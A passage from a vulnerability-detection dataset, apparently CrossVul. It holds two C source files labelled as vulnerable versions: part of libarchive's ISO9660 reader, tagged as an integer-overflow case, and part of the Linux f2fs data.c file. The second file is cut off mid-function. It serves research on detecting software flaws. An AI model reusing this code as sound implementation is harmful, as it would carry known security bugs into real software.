/* Expand our pending files list as necessary. */
if (heap->used >= heap->allocated) {
struct file_info **new_pending_files;
int new_size = heap->allocated * 2;
if (heap->allocated < 1024)
new_size = 1024;
/* Overflow might keep us from growing the list. */
if (new_size <= heap->allocated) {
archive_set_error(&a->archive,
ENOMEM, "Out of memory");
return (ARCHIVE_FATAL);
}
new_pending_files = (struct file_info **)
malloc(new_size * sizeof(new_pending_files[0]));
if (new_pending_files == NULL) {
archive_set_error(&a->archive,
ENOMEM, "Out of memory");
return (ARCHIVE_FATAL);
}
memcpy(new_pending_files, heap->files,
heap->allocated * sizeof(new_pending_files[0]));
if (heap->files != NULL)
free(heap->files);
heap->files = new_pending_files;
heap->allocated = new_size;
}
file_key = file->key = key;
/*
* Start with hole at end, walk it up tree to find insertion point.
*/
hole = heap->used++;
while (hole > 0) {
parent = (hole - 1)/2;
parent_key = heap->files[parent]->key;
if (file_key >= parent_key) {
heap->files[hole] = file;
return (ARCHIVE_OK);
}
/* Move parent into hole <==> move hole up tree. */
heap->files[hole] = heap->files[parent];
hole = parent;
}
heap->files[0] = file;
return (ARCHIVE_OK);
}
static struct file_info *
heap_get_entry(struct heap_queue *heap)
{
uint64_t a_key, b_key, c_key;
int a, b, c;
struct file_info *r, *tmp;
if (heap->used < 1)
return (NULL);
/*
* The first file in the list is the earliest; we'll return this.
*/
r = heap->files[0];
/*
* Move the last item in the heap to the root of the tree
*/
heap->files[0] = heap->files[--(heap->used)];
/*
* Rebalance the heap.
*/
a = 0; /* Starting element and its heap key */
a_key = heap->files[a]->key;
for (;;) {
b = a + a + 1; /* First child */
if (b >= heap->used)
return (r);
b_key = heap->files[b]->key;
c = b + 1; /* Use second child if it is smaller. */
if (c < heap->used) {
c_key = heap->files[c]->key;
if (c_key < b_key) {
b = c;
b_key = c_key;
}
}
if (a_key <= b_key)
return (r);
tmp = heap->files[a];
heap->files[a] = heap->files[b];
heap->files[b] = tmp;
a = b;
}
}
static unsigned int
toi(const void *p, int n)
{
const unsigned char *v = (const unsigned char *)p;
if (n > 1)
return v[0] + 256 * toi(v + 1, n - 1);
if (n == 1)
return v[0];
return (0);
}
static time_t
isodate7(const unsigned char *v)
{
struct tm tm;
int offset;
time_t t;
memset(&tm, 0, sizeof(tm));
tm.tm_year = v[0];
tm.tm_mon = v[1] - 1;
tm.tm_mday = v[2];
tm.tm_hour = v[3];
tm.tm_min = v[4];
tm.tm_sec = v[5];
/* v[6] is the signed timezone offset, in 1/4-hour increments. */
offset = ((const signed char *)v)[6];
if (offset > -48 && offset < 52) {
tm.tm_hour -= offset / 4;
tm.tm_min -= (offset % 4) * 15;
}
t = time_from_tm(&tm);
if (t == (time_t)-1)
return ((time_t)0);
return (t);
}
static time_t
isodate17(const unsigned char *v)
{
struct tm tm;
int offset;
time_t t;
memset(&tm, 0, sizeof(tm));
tm.tm_year = (v[0] - '0') * 1000 + (v[1] - '0') * 100
+ (v[2] - '0') * 10 + (v[3] - '0')
- 1900;
tm.tm_mon = (v[4] - '0') * 10 + (v[5] - '0');
tm.tm_mday = (v[6] - '0') * 10 + (v[7] - '0');
tm.tm_hour = (v[8] - '0') * 10 + (v[9] - '0');
tm.tm_min = (v[10] - '0') * 10 + (v[11] - '0');
tm.tm_sec = (v[12] - '0') * 10 + (v[13] - '0');
/* v[16] is the signed timezone offset, in 1/4-hour increments. */
offset = ((const signed char *)v)[16];
if (offset > -48 && offset < 52) {
tm.tm_hour -= offset / 4;
tm.tm_min -= (offset % 4) * 15;
}
t = time_from_tm(&tm);
if (t == (time_t)-1)
return ((time_t)0);
return (t);
}
static time_t
time_from_tm(struct tm *t)
{
#if HAVE_TIMEGM
/* Use platform timegm() if available. */
return (timegm(t));
#elif HAVE__MKGMTIME64
return (_mkgmtime64(t));
#else
/* Else use direct calculation using POSIX assumptions. */
/* First, fix up tm_yday based on the year/month/day. */
if (mktime(t) == (time_t)-1)
return ((time_t)-1);
/* Then we can compute timegm() from first principles. */
return (t->tm_sec
+ t->tm_min * 60
+ t->tm_hour * 3600
+ t->tm_yday * 86400
+ (t->tm_year - 70) * 31536000
+ ((t->tm_year - 69) / 4) * 86400
- ((t->tm_year - 1) / 100) * 86400
+ ((t->tm_year + 299) / 400) * 86400);
#endif
}
static const char *
build_pathname(struct archive_string *as, struct file_info *file, int depth)
{
// Plain ISO9660 only allows 8 dir levels; if we get
// to 1000, then something is very, very wrong.
if (depth > 1000) {
return NULL;
}
if (file->parent != NULL && archive_strlen(&file->parent->name) > 0) {
if (build_pathname(as, file->parent, depth + 1) == NULL) {
return NULL;
}
archive_strcat(as, "/");
}
if (archive_strlen(&file->name) == 0)
archive_strcat(as, ".");
else
archive_string_concat(as, &file->name);
return (as->s);
}
static int
build_pathname_utf16be(unsigned char *p, size_t max, size_t *len,
struct file_info *file)
{
if (file->parent != NULL && file->parent->utf16be_bytes > 0) {
if (build_pathname_utf16be(p, max, len, file->parent) != 0)
return (-1);
p[*len] = 0;
p[*len + 1] = '/';
*len += 2;
}
if (file->utf16be_bytes == 0) {
if (*len + 2 > max)
return (-1);/* Path is too long! */
p[*len] = 0;
p[*len + 1] = '.';
*len += 2;
} else {
if (*len + file->utf16be_bytes > max)
return (-1);/* Path is too long! */
memcpy(p + *len, file->utf16be_name, file->utf16be_bytes);
*len += file->utf16be_bytes;
}
return (0);
}
#if DEBUG
static void
dump_isodirrec(FILE *out, const unsigned char *isodirrec)
{
fprintf(out, " l %d,",
toi(isodirrec + DR_length_offset, DR_length_size));
fprintf(out, " a %d,",
toi(isodirrec + DR_ext_attr_length_offset, DR_ext_attr_length_size));
fprintf(out, " ext 0x%x,",
toi(isodirrec + DR_extent_offset, DR_extent_size));
fprintf(out, " s %d,",
toi(isodirrec + DR_size_offset, DR_extent_size));
fprintf(out, " f 0x%x,",
toi(isodirrec + DR_flags_offset, DR_flags_size));
fprintf(out, " u %d,",
toi(isodirrec + DR_file_unit_size_offset, DR_file_unit_size_size));
fprintf(out, " ilv %d,",
toi(isodirrec + DR_interleave_offset, DR_interleave_size));
fprintf(out, " seq %d,",
toi(isodirrec + DR_volume_sequence_number_offset,
DR_volume_sequence_number_size));
fprintf(out, " nl %d:",
toi(isodirrec + DR_name_len_offset, DR_name_len_size));
fprintf(out, " `%.*s'",
toi(isodirrec + DR_name_len_offset, DR_name_len_size),
isodirrec + DR_name_offset);
}
#endif
| ./CrossVul/dataset_final_sorted/CWE-190/c/bad_5181_0 |
crossvul-cpp_data_bad_3028_0 | /*
* fs/f2fs/data.c
*
* Copyright (c) 2012 Samsung Electronics Co., Ltd.
* http://www.samsung.com/
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License version 2 as
* published by the Free Software Foundation.
*/
#include <linux/fs.h>
#include <linux/f2fs_fs.h>
#include <linux/buffer_head.h>
#include <linux/mpage.h>
#include <linux/writeback.h>
#include <linux/backing-dev.h>
#include <linux/pagevec.h>
#include <linux/blkdev.h>
#include <linux/bio.h>
#include <linux/prefetch.h>
#include <linux/uio.h>
#include <linux/mm.h>
#include <linux/memcontrol.h>
#include <linux/cleancache.h>
#include "f2fs.h"
#include "node.h"
#include "segment.h"
#include "trace.h"
#include <trace/events/f2fs.h>
static bool __is_cp_guaranteed(struct page *page)
{
struct address_space *mapping = page->mapping;
struct inode *inode;
struct f2fs_sb_info *sbi;
if (!mapping)
return false;
inode = mapping->host;
sbi = F2FS_I_SB(inode);
if (inode->i_ino == F2FS_META_INO(sbi) ||
inode->i_ino == F2FS_NODE_INO(sbi) ||
S_ISDIR(inode->i_mode) ||
is_cold_data(page))
return true;
return false;
}
static void f2fs_read_end_io(struct bio *bio)
{
struct bio_vec *bvec;
int i;
#ifdef CONFIG_F2FS_FAULT_INJECTION
if (time_to_inject(F2FS_P_SB(bio->bi_io_vec->bv_page), FAULT_IO))
bio->bi_error = -EIO;
#endif
if (f2fs_bio_encrypted(bio)) {
if (bio->bi_error) {
fscrypt_release_ctx(bio->bi_private);
} else {
fscrypt_decrypt_bio_pages(bio->bi_private, bio);
return;
}
}
bio_for_each_segment_all(bvec, bio, i) {
struct page *page = bvec->bv_page;
if (!bio->bi_error) {
if (!PageUptodate(page))
SetPageUptodate(page);
} else {
ClearPageUptodate(page);
SetPageError(page);
}
unlock_page(page);
}
bio_put(bio);
}
static void f2fs_write_end_io(struct bio *bio)
{
struct f2fs_sb_info *sbi = bio->bi_private;
struct bio_vec *bvec;
int i;
bio_for_each_segment_all(bvec, bio, i) {
struct page *page = bvec->bv_page;
enum count_type type = WB_DATA_TYPE(page);
if (IS_DUMMY_WRITTEN_PAGE(page)) {
set_page_private(page, (unsigned long)NULL);
ClearPagePrivate(page);
unlock_page(page);
mempool_free(page, sbi->write_io_dummy);
if (unlikely(bio->bi_error))
f2fs_stop_checkpoint(sbi, true);
continue;
}
fscrypt_pullback_bio_page(&page, true);
if (unlikely(bio->bi_error)) {
mapping_set_error(page->mapping, -EIO);
f2fs_stop_checkpoint(sbi, true);
}
dec_page_count(sbi, type);
clear_cold_data(page);
end_page_writeback(page);
}
if (!get_pages(sbi, F2FS_WB_CP_DATA) &&
wq_has_sleeper(&sbi->cp_wait))
wake_up(&sbi->cp_wait);
bio_put(bio);
}
/*
* Return true, if pre_bio's bdev is same as its target device.
*/
struct block_device *f2fs_target_device(struct f2fs_sb_info *sbi,
block_t blk_addr, struct bio *bio)
{
struct block_device *bdev = sbi->sb->s_bdev;
int i;
for (i = 0; i < sbi->s_ndevs; i++) {
if (FDEV(i).start_blk <= blk_addr &&
FDEV(i).end_blk >= blk_addr) {
blk_addr -= FDEV(i).start_blk;
bdev = FDEV(i).bdev;
break;
}
}
if (bio) {
bio->bi_bdev = bdev;
bio->bi_iter.bi_sector = SECTOR_FROM_BLOCK(blk_addr);
}
return bdev;
}
int f2fs_target_device_index(struct f2fs_sb_info *sbi, block_t blkaddr)
{
int i;
for (i = 0; i < sbi->s_ndevs; i++)
if (FDEV(i).start_blk <= blkaddr && FDEV(i).end_blk >= blkaddr)
return i;
return 0;
}
static bool __same_bdev(struct f2fs_sb_info *sbi,
block_t blk_addr, struct bio *bio)
{
return f2fs_target_device(sbi, blk_addr, NULL) == bio->bi_bdev;
}
/*
* Low-level block read/write IO operations.
*/
static struct bio *__bio_alloc(struct f2fs_sb_info *sbi, block_t blk_addr,
int npages, bool is_read)
{
struct bio *bio;
bio = f2fs_bio_alloc(npages);
f2fs_target_device(sbi, blk_addr, bio);
bio->bi_end_io = is_read ? f2fs_read_end_io : f2fs_write_end_io;
bio->bi_private = is_read ? NULL : sbi;
return bio;
}
static inline void __submit_bio(struct f2fs_sb_info *sbi,
struct bio *bio, enum page_type type)
{
if (!is_read_io(bio_op(bio))) {
unsigned int start;
if (f2fs_sb_mounted_blkzoned(sbi->sb) &&
current->plug && (type == DATA || type == NODE))
blk_finish_plug(current->plug);
if (type != DATA && type != NODE)
goto submit_io;
start = bio->bi_iter.bi_size >> F2FS_BLKSIZE_BITS;
start %= F2FS_IO_SIZE(sbi);
if (start == 0)
goto submit_io;
/* fill dummy pages */
for (; start < F2FS_IO_SIZE(sbi); start++) {
struct page *page =
mempool_alloc(sbi->write_io_dummy,
GFP_NOIO | __GFP_ZERO | __GFP_NOFAIL);
f2fs_bug_on(sbi, !page);
SetPagePrivate(page);
set_page_private(page, (unsigned long)DUMMY_WRITTEN_PAGE);
lock_page(page);
if (bio_add_page(bio, page, PAGE_SIZE, 0) < PAGE_SIZE)
f2fs_bug_on(sbi, 1);
}
/*
* In the NODE case, we lose next block address chain. So, we
* need to do checkpoint in f2fs_sync_file.
*/
if (type == NODE)
set_sbi_flag(sbi, SBI_NEED_CP);
}
submit_io:
if (is_read_io(bio_op(bio)))
trace_f2fs_submit_read_bio(sbi->sb, type, bio);
else
trace_f2fs_submit_write_bio(sbi->sb, type, bio);
submit_bio(bio);
}
static void __submit_merged_bio(struct f2fs_bio_info *io)
{
struct f2fs_io_info *fio = &io->fio;
if (!io->bio)
return;
bio_set_op_attrs(io->bio, fio->op, fio->op_flags);
if (is_read_io(fio->op))
trace_f2fs_prepare_read_bio(io->sbi->sb, fio->type, io->bio);
else
trace_f2fs_prepare_write_bio(io->sbi->sb, fio->type, io->bio);
__submit_bio(io->sbi, io->bio, fio->type);
io->bio = NULL;
}
static bool __has_merged_page(struct f2fs_bio_info *io, struct inode *inode,
struct page *page, nid_t ino)
{
struct bio_vec *bvec;
struct page *target;
int i;
if (!io->bio)
return false;
if (!inode && !page && !ino)
return true;
bio_for_each_segment_all(bvec, io->bio, i) {
if (bvec->bv_page->mapping)
target = bvec->bv_page;
else
target = fscrypt_control_page(bvec->bv_page);
if (inode && inode == target->mapping->host)
return true;
if (page && page == target)
return true;
if (ino && ino == ino_of_node(target))
return true;
}
return false;
}
static bool has_merged_page(struct f2fs_sb_info *sbi, struct inode *inode,
struct page *page, nid_t ino,
enum page_type type)
{
enum page_type btype = PAGE_TYPE_OF_BIO(type);
struct f2fs_bio_info *io = &sbi->write_io[btype];
bool ret;
down_read(&io->io_rwsem);
ret = __has_merged_page(io, inode, page, ino);
up_read(&io->io_rwsem);
return ret;
}
static void __f2fs_submit_merged_bio(struct f2fs_sb_info *sbi,
struct inode *inode, struct page *page,
nid_t ino, enum page_type type, int rw)
{
enum page_type btype = PAGE_TYPE_OF_BIO(type);
struct f2fs_bio_info *io;
io = is_read_io(rw) ? &sbi->read_io : &sbi->write_io[btype];
down_write(&io->io_rwsem);
if (!__has_merged_page(io, inode, page, ino))
goto out;
/* change META to META_FLUSH in the checkpoint procedure */
if (type >= META_FLUSH) {
io->fio.type = META_FLUSH;
io->fio.op = REQ_OP_WRITE;
io->fio.op_flags = REQ_PREFLUSH | REQ_META | REQ_PRIO;
if (!test_opt(sbi, NOBARRIER))
io->fio.op_flags |= REQ_FUA;
}
__submit_merged_bio(io);
out:
up_write(&io->io_rwsem);
}
void f2fs_submit_merged_bio(struct f2fs_sb_info *sbi, enum page_type type,
int rw)
{
__f2fs_submit_merged_bio(sbi, NULL, NULL, 0, type, rw);
}
void f2fs_submit_merged_bio_cond(struct f2fs_sb_info *sbi,
struct inode *inode, struct page *page,
nid_t ino, enum page_type type, int rw)
{
if (has_merged_page(sbi, inode, page, ino, type))
__f2fs_submit_merged_bio(sbi, inode, page, ino, type, rw);
}
void f2fs_flush_merged_bios(struct f2fs_sb_info *sbi)
{
f2fs_submit_merged_bio(sbi, DATA, WRITE);
f2fs_submit_merged_bio(sbi, NODE, WRITE);
f2fs_submit_merged_bio(sbi, META, WRITE);
}
/*
* Fill the locked page with data located in the block address.
* Return unlocked page.
*/
int f2fs_submit_page_bio(struct f2fs_io_info *fio)
{
struct bio *bio;
struct page *page = fio->encrypted_page ?
fio->encrypted_page : fio->page;
trace_f2fs_submit_page_bio(page, fio);
f2fs_trace_ios(fio, 0);
/* Allocate a new bio */
bio = __bio_alloc(fio->sbi, fio->new_blkaddr, 1, is_read_io(fio->op));
if (bio_add_page(bio, page, PAGE_SIZE, 0) < PAGE_SIZE) {
bio_put(bio);
return -EFAULT;
}
bio_set_op_attrs(bio, fio->op, fio->op_flags);
__submit_bio(fio->sbi, bio, fio->type);
return 0;
}
int f2fs_submit_page_mbio(struct f2fs_io_info *fio)
{
struct f2fs_sb_info *sbi = fio->sbi;
enum page_type btype = PAGE_TYPE_OF_BIO(fio->type);
struct f2fs_bio_info *io;
bool is_read = is_read_io(fio->op);
struct page *bio_page;
int err = 0;
io = is_read ? &sbi->read_io : &sbi->write_io[btype];
if (fio->old_blkaddr != NEW_ADDR)
verify_block_addr(sbi, fio->old_blkaddr);
verify_block_addr(sbi, fio->new_blkaddr);
bio_page = fio->encrypted_page ? fio->encrypted_page : fio->page;
if (!is_read)
inc_page_count(sbi, WB_DATA_TYPE(bio_page));
down_write(&io->io_rwsem);
if (io->bio && (io->last_block_in_bio != fio->new_blkaddr - 1 ||
(io->fio.op != fio->op || io->fio.op_flags != fio->op_flags) ||
!__same_bdev(sbi, fio->new_blkaddr, io->bio)))
__submit_merged_bio(io);
alloc_new:
if (io->bio == NULL) {
if ((fio->type == DATA || fio->type == NODE) &&
fio->new_blkaddr & F2FS_IO_SIZE_MASK(sbi)) {
err = -EAGAIN;
dec_page_count(sbi, WB_DATA_TYPE(bio_page));
goto out_fail;
}
io->bio = __bio_alloc(sbi, fio->new_blkaddr,
BIO_MAX_PAGES, is_read);
io->fio = *fio;
}
if (bio_add_page(io->bio, bio_page, PAGE_SIZE, 0) <
PAGE_SIZE) {
__submit_merged_bio(io);
goto alloc_new;
}
io->last_block_in_bio = fio->new_blkaddr;
f2fs_trace_ios(fio, 0);
out_fail:
up_write(&io->io_rwsem);
trace_f2fs_submit_page_mbio(fio->page, fio);
return err;
}
static void __set_data_blkaddr(struct dnode_of_data *dn)
{
struct f2fs_node *rn = F2FS_NODE(dn->node_page);
__le32 *addr_array;
/* Get physical address of data block */
addr_array = blkaddr_in_node(rn);
addr_array[dn->ofs_in_node] = cpu_to_le32(dn->data_blkaddr);
}
/*
* Lock ordering for the change of data block address:
* ->data_page
* ->node_page
* update block addresses in the node page
*/
void set_data_blkaddr(struct dnode_of_data *dn)
{
f2fs_wait_on_page_writeback(dn->node_page, NODE, true);
__set_data_blkaddr(dn);
if (set_page_dirty(dn->node_page))
dn->node_changed = true;
}
void f2fs_update_data_blkaddr(struct dnode_of_data *dn, block_t blkaddr)
{
dn->data_blkaddr = blkaddr;
set_data_blkaddr(dn);
f2fs_update_extent_cache(dn);
}
/* dn->ofs_in_node will be returned with up-to-date last block pointer */
int reserve_new_blocks(struct dnode_of_data *dn, blkcnt_t count)
{
struct f2fs_sb_info *sbi = F2FS_I_SB(dn->inode);
if (!count)
return 0;
if (unlikely(is_inode_flag_set(dn->inode, FI_NO_ALLOC)))
return -EPERM;
if (unlikely(!inc_valid_block_count(sbi, dn->inode, &count)))
return -ENOSPC;
trace_f2fs_reserve_new_blocks(dn->inode, dn->nid,
dn->ofs_in_node, count);
f2fs_wait_on_page_writeback(dn->node_page, NODE, true);
for (; count > 0; dn->ofs_in_node++) {
block_t blkaddr =
datablock_addr(dn->node_page, dn->ofs_in_node);
if (blkaddr == NULL_ADDR) {
dn->data_blkaddr = NEW_ADDR;
__set_data_blkaddr(dn);
count--;
}
}
if (set_page_dirty(dn->node_page))
dn->node_changed = true;
return 0;
}
/* Should keep dn->ofs_in_node unchanged */
int reserve_new_block(struct dnode_of_data *dn)
{
unsigned int ofs_in_node = dn->ofs_in_node;
int ret;
ret = reserve_new_blocks(dn, 1);
dn->ofs_in_node = ofs_in_node;
return ret;
}
int f2fs_reserve_block(struct dnode_of_data *dn, pgoff_t index)
{
bool need_put = dn->inode_page ? false : true;
int err;
err = get_dnode_of_data(dn, index, ALLOC_NODE);
if (err)
return err;
if (dn->data_blkaddr == NULL_ADDR)
err = reserve_new_block(dn);
if (err || need_put)
f2fs_put_dnode(dn);
return err;
}
int f2fs_get_block(struct dnode_of_data *dn, pgoff_t index)
{
struct extent_info ei;
struct inode *inode = dn->inode;
if (f2fs_lookup_extent_cache(inode, index, &ei)) {
dn->data_blkaddr = ei.blk + index - ei.fofs;
return 0;
}
return f2fs_reserve_block(dn, index);
}
struct page *get_read_data_page(struct inode *inode, pgoff_t index,
int op_flags, bool for_write)
{
struct address_space *mapping = inode->i_mapping;
struct dnode_of_data dn;
struct page *page;
struct extent_info ei;
int err;
struct f2fs_io_info fio = {
.sbi = F2FS_I_SB(inode),
.type = DATA,
.op = REQ_OP_READ,
.op_flags = op_flags,
.encrypted_page = NULL,
};
if (f2fs_encrypted_inode(inode) && S_ISREG(inode->i_mode))
return read_mapping_page(mapping, index, NULL);
page = f2fs_grab_cache_page(mapping, index, for_write);
if (!page)
return ERR_PTR(-ENOMEM);
if (f2fs_lookup_extent_cache(inode, index, &ei)) {
dn.data_blkaddr = ei.blk + index - ei.fofs;
goto got_it;
}
set_new_dnode(&dn, inode, NULL, NULL, 0);
err = get_dnode_of_data(&dn, index, LOOKUP_NODE);
if (err)
goto put_err;
f2fs_put_dnode(&dn);
if (unlikely(dn.data_blkaddr == NULL_ADDR)) {
err = -ENOENT;
goto put_err;
}
got_it:
if (PageUptodate(page)) {
unlock_page(page);
return page;
}
/*
* A new dentry page is allocated but not able to be written, since its
* new inode page couldn't be allocated due to -ENOSPC.
* In such the case, its blkaddr can be remained as NEW_ADDR.
* see, f2fs_add_link -> get_new_data_page -> init_inode_metadata.
*/
if (dn.data_blkaddr == NEW_ADDR) {
zero_user_segment(page, 0, PAGE_SIZE);
if (!PageUptodate(page))
SetPageUptodate(page);
unlock_page(page);
return page;
}
fio.new_blkaddr = fio.old_blkaddr = dn.data_blkaddr;
fio.page = page;
err = f2fs_submit_page_bio(&fio);
if (err)
goto put_err;
return page;
put_err:
f2fs_put_page(page, 1);
return ERR_PTR(err);
}
struct page *find_data_page(struct inode *inode, pgoff_t index)
{
struct address_space *mapping = inode->i_mapping;
struct page *page;
page = find_get_page(mapping, index);
if (page && PageUptodate(page))
return page;
f2fs_put_page(page, 0);
page = get_read_data_page(inode, index, 0, false);
if (IS_ERR(page))
return page;
if (PageUptodate(page))
return page;
wait_on_page_locked(page);
if (unlikely(!PageUptodate(page))) {
f2fs_put_page(page, 0);
return ERR_PTR(-EIO);
}
return page;
}
/*
* If it tries to access a hole, return an error.
* Because, the callers, functions in dir.c and GC, should be able to know
* whether this page exists or not.
*/
struct page *get_lock_data_page(struct inode *inode, pgoff_t index,
bool for_write)
{
struct address_space *mapping = inode->i_mapping;
struct page *page;
repeat:
page = get_read_data_page(inode, index, 0, for_write);
if (IS_ERR(page))
return page;
/* wait for read completion */
lock_page(page);
if (unlikely(page->mapping != mapping)) {
f2fs_put_page(page, 1);
goto repeat;
}
if (unlikely(!PageUptodate(page))) {
f2fs_put_page(page, 1);
return ERR_PTR(-EIO);
}
return page;
}
/*
* Caller ensures that this data page is never allocated.
* A new zero-filled data page is allocated in the page cache.
*
* Also, caller should grab and release a rwsem by calling f2fs_lock_op() and
* f2fs_unlock_op().
* Note that, ipage is set only by make_empty_dir, and if any error occur,
* ipage should be released by this function.
*/
struct page *get_new_data_page(struct inode *inode,
struct page *ipage, pgoff_t index, bool new_i_size)
{
struct address_space *mapping = inode->i_mapping;
struct page *page;
struct dnode_of_data dn;
int err;
page = f2fs_grab_cache_page(mapping, index, true);
if (!page) {
/*
* before exiting, we should make sure ipage will be released
* if any error occur.
*/
f2fs_put_page(ipage, 1);
return ERR_PTR(-ENOMEM);
}
set_new_dnode(&dn, inode, ipage, NULL, 0);
err = f2fs_reserve_block(&dn, index);
if (err) {
f2fs_put_page(page, 1);
return ERR_PTR(err);
}
if (!ipage)
f2fs_put_dnode(&dn);
if (PageUptodate(page))
goto got_it;
if (dn.data_blkaddr == NEW_ADDR) {
zero_user_segment(page, 0, PAGE_SIZE);
if (!PageUptodate(page))
SetPageUptodate(page);
} else {
f2fs_put_page(page, 1);
/* if ipage exists, blkaddr should be NEW_ADDR */
f2fs_bug_on(F2FS_I_SB(inode), ipage);
page = get_lock_data_page(inode, index, true);
if (IS_ERR(page))
return page;
}
got_it:
if (new_i_size && i_size_read(inode) <
((loff_t)(index + 1) << PAGE_SHIFT))
f2fs_i_size_write(inode, ((loff_t)(index + 1) << PAGE_SHIFT));
return page;
}
static int __allocate_data_block(struct dnode_of_data *dn)
{
struct f2fs_sb_info *sbi = F2FS_I_SB(dn->inode);
struct f2fs_summary sum;
struct node_info ni;
pgoff_t fofs;
blkcnt_t count = 1;
if (unlikely(is_inode_flag_set(dn->inode, FI_NO_ALLOC)))
return -EPERM;
dn->data_blkaddr = datablock_addr(dn->node_page, dn->ofs_in_node);
if (dn->data_blkaddr == NEW_ADDR)
goto alloc;
if (unlikely(!inc_valid_block_count(sbi, dn->inode, &count)))
return -ENOSPC;
alloc:
get_node_info(sbi, dn->nid, &ni);
set_summary(&sum, dn->nid, dn->ofs_in_node, ni.version);
allocate_data_block(sbi, NULL, dn->data_blkaddr, &dn->data_blkaddr,
&sum, CURSEG_WARM_DATA);
set_data_blkaddr(dn);
/* update i_size */
fofs = start_bidx_of_node(ofs_of_node(dn->node_page), dn->inode) +
dn->ofs_in_node;
if (i_size_read(dn->inode) < ((loff_t)(fofs + 1) << PAGE_SHIFT))
f2fs_i_size_write(dn->inode,
((loff_t)(fofs + 1) << PAGE_SHIFT));
return 0;
}
static inline bool __force_buffered_io(struct inode *inode, int rw)
{
return ((f2fs_encrypted_inode(inode) && S_ISREG(inode->i_mode)) ||
(rw == WRITE && test_opt(F2FS_I_SB(inode), LFS)) ||
F2FS_I_SB(inode)->s_ndevs);
}
int f2fs_preallocate_blocks(struct kiocb *iocb, struct iov_iter *from)
{
struct inode *inode = file_inode(iocb->ki_filp);
struct f2fs_map_blocks map;
int err = 0;
if (is_inode_flag_set(inode, FI_NO_PREALLOC))
return 0;
map.m_lblk = F2FS_BLK_ALIGN(iocb->ki_pos);
map.m_len = F2FS_BYTES_TO_BLK(iocb->ki_pos + iov_iter_count(from));
if (map.m_len > map.m_lblk)
map.m_len -= map.m_lblk;
else
map.m_len = 0;
map.m_next_pgofs = NULL;
if (iocb->ki_flags & IOCB_DIRECT) {
err = f2fs_convert_inline_inode(inode);
if (err)
return err;
return f2fs_map_blocks(inode, &map, 1,
__force_buffered_io(inode, WRITE) ?
F2FS_GET_BLOCK_PRE_AIO :
F2FS_GET_BLOCK_PRE_DIO);
}
if (iocb->ki_pos + iov_iter_count(from) > MAX_INLINE_DATA) {
err = f2fs_convert_inline_inode(inode);
if (err)
return err;
}
if (!f2fs_has_inline_data(inode))
return f2fs_map_blocks(inode, &map, 1, F2FS_GET_BLOCK_PRE_AIO);
return err;
}
/*
* f2fs_map_blocks() now supported readahead/bmap/rw direct_IO with
* f2fs_map_blocks structure.
* If original data blocks are allocated, then give them to blockdev.
* Otherwise,
* a. preallocate requested block addresses
* b. do not use extent cache for better performance
* c. give the block addresses to blockdev
*/
int f2fs_map_blocks(struct inode *inode, struct f2fs_map_blocks *map,
int create, int flag)
{
unsigned int maxblocks = map->m_len;
struct dnode_of_data dn;
struct f2fs_sb_info *sbi = F2FS_I_SB(inode);
int mode = create ? ALLOC_NODE : LOOKUP_NODE;
pgoff_t pgofs, end_offset, end;
int err = 0, ofs = 1;
unsigned int ofs_in_node, last_ofs_in_node;
blkcnt_t prealloc;
struct extent_info ei;
block_t blkaddr;
if (!maxblocks)
return 0;
map->m_len = 0;
map->m_flags = 0;
/* it only supports block size == page size */
pgofs = (pgoff_t)map->m_lblk;
end = pgofs + maxblocks;
if (!create && f2fs_lookup_extent_cache(inode, pgofs, &ei)) {
map->m_pblk = ei.blk + pgofs - ei.fofs;
map->m_len = min((pgoff_t)maxblocks, ei.fofs + ei.len - pgofs);
map->m_flags = F2FS_MAP_MAPPED;
goto out;
}
next_dnode:
if (create)
f2fs_lock_op(sbi);
/* When reading holes, we need its node page */
set_new_dnode(&dn, inode, NULL, NULL, 0);
err = get_dnode_of_data(&dn, pgofs, mode);
if (err) {
if (flag == F2FS_GET_BLOCK_BMAP)
map->m_pblk = 0;
if (err == -ENOENT) {
err = 0;
if (map->m_next_pgofs)
*map->m_next_pgofs =
get_next_page_offset(&dn, pgofs);
}
goto unlock_out;
}
prealloc = 0;
last_ofs_in_node = ofs_in_node = dn.ofs_in_node;
end_offset = ADDRS_PER_PAGE(dn.node_page, inode);
next_block:
blkaddr = datablock_addr(dn.node_page, dn.ofs_in_node);
if (blkaddr == NEW_ADDR || blkaddr == NULL_ADDR) {
if (create) {
if (unlikely(f2fs_cp_error(sbi))) {
err = -EIO;
goto sync_out;
}
if (flag == F2FS_GET_BLOCK_PRE_AIO) {
if (blkaddr == NULL_ADDR) {
prealloc++;
last_ofs_in_node = dn.ofs_in_node;
}
} else {
err = __allocate_data_block(&dn);
if (!err)
set_inode_flag(inode, FI_APPEND_WRITE);
}
if (err)
goto sync_out;
map->m_flags = F2FS_MAP_NEW;
blkaddr = dn.data_blkaddr;
} else {
if (flag == F2FS_GET_BLOCK_BMAP) {
map->m_pblk = 0;
goto sync_out;
}
if (flag == F2FS_GET_BLOCK_FIEMAP &&
blkaddr == NULL_ADDR) {
if (map->m_next_pgofs)
*map->m_next_pgofs = pgofs + 1;
}
if (flag != F2FS_GET_BLOCK_FIEMAP ||
blkaddr != NEW_ADDR)
goto sync_out;
}
}
if (flag == F2FS_GET_BLOCK_PRE_AIO)
goto skip;
if (map->m_len == 0) {
/* preallocated unwritten block should be mapped for fiemap. */
if (blkaddr == NEW_ADDR)
map->m_flags |= F2FS_MAP_UNWRITTEN;
map->m_flags |= F2FS_MAP_MAPPED;
map->m_pblk = blkaddr;
map->m_len = 1;
} else if ((map->m_pblk != NEW_ADDR &&
blkaddr == (map->m_pblk + ofs)) ||
(map->m_pblk == NEW_ADDR && blkaddr == NEW_ADDR) ||
flag == F2FS_GET_BLOCK_PRE_DIO) {
ofs++;
map->m_len++;
} else {
goto sync_out;
}
skip:
dn.ofs_in_node++;
pgofs++;
/* preallocate blocks in batch for one dnode page */
if (flag == F2FS_GET_BLOCK_PRE_AIO &&
(pgofs == end || dn.ofs_in_node == end_offset)) {
dn.ofs_in_node = ofs_in_node;
err = reserve_new_blocks(&dn, prealloc);
if (err)
goto sync_out;
map->m_len += dn.ofs_in_node - ofs_in_node;
if (prealloc && dn.ofs_in_node != last_ofs_in_node + 1) {
err = -ENOSPC;
goto sync_out;
}
dn.ofs_in_node = end_offset;
}
if (pgofs >= end)
goto sync_out;
else if (dn.ofs_in_node < end_offset)
goto next_block;
f2fs_put_dnode(&dn);
if (create) {
f2fs_unlock_op(sbi);
f2fs_balance_fs(sbi, dn.node_changed);
}
goto next_dnode;
sync_out:
